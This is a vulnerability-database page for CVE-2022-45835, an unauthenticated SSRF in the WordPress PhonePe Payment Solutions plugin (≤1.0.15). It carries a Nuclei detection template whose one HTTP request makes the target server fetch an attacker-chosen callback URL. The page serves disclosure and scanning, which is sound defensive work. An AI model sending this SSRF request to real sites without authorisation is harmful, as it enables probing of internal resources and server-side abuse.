Vulners
Lucene search
WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2022-45835 | 26 Jan 202500:00 | – | circl |
 | WordPress Plugin PhonePe Payment Solutions Code Issue Vulnerability | 13 Nov 202300:00 | – | cnnvd |
 | CVE-2022-45835 | 13 Nov 202303:06 | – | cve |
 | CVE-2022-45835 WordPress PhonePe Payment Solutions Plugin <= 1.0.15 is vulnerable to Server Side Request Forgery (SSRF) | 13 Nov 202303:06 | – | cvelist |
 | CVE-2022-45835 | 13 Nov 202303:15 | – | nvd |
 | CVE-2022-45835 | 13 Nov 202303:15 | – | osv |
 | WordPress PhonePe Payment Solutions Plugin <= 1.0.15 is vulnerable to Server Side Request Forgery (SSRF) | 13 Mar 202300:00 | – | patchstack |
 | Server side request forgery (ssrf) | 13 Nov 202303:15 | – | prion |
 | PT-2023-14775 · Phonepe · Phonepe Payment Solutions | 13 Nov 202300:00 | – | ptsecurity |
 | CVE-2022-45835 | 22 May 202521:49 | – | redhatcve |
10
id: CVE-2022-45835
info:
name: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server.
remediation: Fixed in version 2.0.0.
reference:
- https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf
- https://wordpress.org/plugins/phonepe-payment-solutions/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45835
- https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-45835
cwe-id: CWE-918
epss-score: 0.71084
epss-percentile: 0.98729
cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: phonepe
product: phonepe
framework: wordpress
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe,vkev,vuln
http:
- raw:
- |
GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "cURL Test for PhonePe"
- type: status
status:
- 200
# digest: 490a0046304402207aad91d75a93f33d05c5590dd0836091238dcd664dd06edf57aaad295ccb4505022003988c4ecdc90fdde6439cd7276c304368121e7364fe288f87020e78c45712a1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.15.8 - 7.5
EPSS0.71084
SSVC